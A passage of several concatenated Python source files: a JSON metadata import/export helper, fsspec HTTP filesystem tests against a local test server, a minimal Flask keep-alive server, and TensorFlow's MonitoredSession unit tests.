return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
test_http.py
|
import glob
import os
import pytest
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import fsspec
requests = pytest.importorskip('requests')
port = 9898
data = b'\n'.join([b'some test data'] * 1000)
realfile = "http://localhost:%i/index/realfile" % port
index = b'<a href="%s">Link</a>' % realfile.encode()
class HTTPTestHandler(BaseHTTPRequestHandler):
def _respond(self, code=200, headers=None, data=b''):
headers = headers or {}
headers.update({'User-Agent': 'test'})
self.send_response(code)
for k, v in headers.items():
self.send_header(k, str(v))
self.end_headers()
if data:
self.wfile.write(data)
def do_GET(self):
if self.path not in ['/index/realfile', '/index']:
self._respond(404)
return
d = data if self.path == '/index/realfile' else index
if 'Range' in self.headers:
ran = self.headers['Range']
b, ran = ran.split("=")
start, end = ran.split('-')
print(start)
print(end)
d = d[int(start):int(end)+1]
if 'give_length' in self.headers:
self._respond(200, {'Content-Length': len(d)}, d)
elif 'give_range' in self.headers:
self._respond(
200, {'Content-Range': "0-%i/%i" % (len(d) - 1, len(d))},
d
)
else:
self._respond(200, data=d)
def do_HEAD(self):
if 'head_ok' not in self.headers:
self._respond(405)
return
d = data if self.path == '/index/realfile' else index
if self.path not in ['/index/realfile', '/index']:
self._respond(404)
elif 'give_length' in self.headers:
self._respond(200, {'Content-Length': len(d)})
elif 'give_range' in self.headers:
self._respond(200, {'Content-Range': "0-%i/%i" %
(len(d) - 1, len(d))})
else:
self._respond(200) # OK response, but no useful info
@pytest.fixture(scope='module')
def server():
server_address = ('', port)
httpd = HTTPServer(server_address, HTTPTestHandler)
th = threading.Thread(target=httpd.serve_forever)
th.daemon = True
th.start()
try:
yield 'http://localhost:%i' % port
finally:
httpd.socket.close()
httpd.shutdown()
th.join()
def test_list(server):
h = fsspec.filesystem('http')
out = h.glob(server + '/index/*')
assert out == [server + '/index/realfile']
def test_exists(server):
h = fsspec.filesystem('http')
assert not h.exists(server + '/notafile')
def test_read(server):
h = fsspec.filesystem('http')
out = server + '/index/realfile'
with h.open(out, 'rb') as f:
assert f.read() == data
with h.open(out, 'rb', block_size=0) as f:
assert f.read() == data
with h.open(out, 'rb') as f:
assert f.read(100) + f.read() == data
def test_methods(server):
h = fsspec.filesystem('http')
url = server + '/index/realfile'
assert h.exists(url)
assert h.cat(url) == data
@pytest.mark.parametrize('headers', [{},
{'give_length': 'true'},
{'give_length': 'true', 'head_ok': 'true'},
{'give_range': 'true'}
])
def test_random_access(server, headers):
h = fsspec.filesystem('http', headers=headers)
url = server + '/index/realfile'
with h.open(url, 'rb') as f:
if headers:
assert f.size == len(data)
assert f.read(5) == data[:5]
# python server does not respect bytes range request
# we actually get all the data
f.seek(5, 1)
assert f.read(5) == data[10:15]
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I am alive!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
monitored_session_test.py
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import threading
import time
from tensorflow.contrib.framework.python.ops import variables as variables_lib
from tensorflow.contrib.testing.python.framework import util_test
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
class ScaffoldTest(test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.ready_for_local_init_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
variables.Variable(1, name='my_var')
variables.Variable(
2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
with self.test_session() as sess:
self.assertItemsEqual([b'my_var', b'my_local_var'],
sess.run(scaffold.ready_op))
self.assertItemsEqual([b'my_var'],
sess.run(scaffold.ready_for_local_init_op))
sess.run(scaffold.init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
sess.run(scaffold.local_init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
constant_op.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
def test_caches_values(self):
with ops.Graph().as_default():
variables.Variable([1])
scaffold1 = monitored_session.Scaffold()
scaffold1.finalize()
scaffold2 = monitored_session.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.ready_for_local_init_op,
scaffold2.ready_for_local_init_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with ops.Graph().as_default():
variables.Variable([1])
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
monitored_session.Scaffold().finalize()
def test_uses_passed_values(self):
with ops.Graph().as_default():
variables.Variable([1])
saver = saver_lib.Saver()
scaffold = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.ready_for_local_init_op)
self.assertEqual(7, scaffold.local_init_op)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with ops.Graph().as_default():
variables.Variable([1])
monitored_session.Scaffold().finalize()
with self.assertRaisesRegexp(RuntimeError,
'Graph is finalized and cannot be modified'):
constant_op.constant([0])
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = collections.Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def after_create_session(self, session): # pylint: disable=unused-argument
self.call_counter['after_create_session'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_summaries(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
for _ in range(101): # 100 is default summary writing steps
session.run(new_gstep)
summaries = util_test.latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(test.TestCase):
"""_WrappedSession tests."""
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEquals(sess.graph, wrapped_sess.graph)
self.assertEquals(sess.sess_str, wrapped_sess.sess_str)
def test_should_stop_on_close(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_uses_check_stop(self):
with self.test_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_delegates_to_wrapped_session(self):
with self.test_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
def test_close_twice(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
"""_CoordinatedSession tests."""
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEquals(sess.graph, coord_sess.graph)
self.assertEquals(sess.sess_str, coord_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
def test_should_stop_on_close(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
def test_should_stop_on_coord_stop(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
def test_stop_threads_on_close_after_exception(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
class AbortAtNSession(object):
"""A mock sessionthat aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise errors_impl.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
def test_recovery(self):
with self.test_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
# Make the recoverable session uses these 3 sessions in sequence by
# passing a factory that pops from the session_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
"""Tests of _HookedSession."""
def testRunPassesAllArguments(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
session_run_hook.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
session_run_hook.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['begin'], 0)
self.assertEqual(hook.call_counter['after_create_session'], 0)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
another_tensor = constant_op.constant([5], name='another_tensor')
third_tensor = constant_op.constant([10], name='third_tensor')
mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
sess.run(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
c_tensor = constant_op.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [10]})
sess.run(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
sess.run(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
[self._debug_tensor_watch])
return session_run_hook.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with ops.Graph().as_default():
a_var = variables.Variable(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
scaffold = monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
scaffold = monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
# This set of tests, verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [
basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_on_aborted_error(self):
# Tests that we silently retry on abort. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with ops.Graph().as_default():
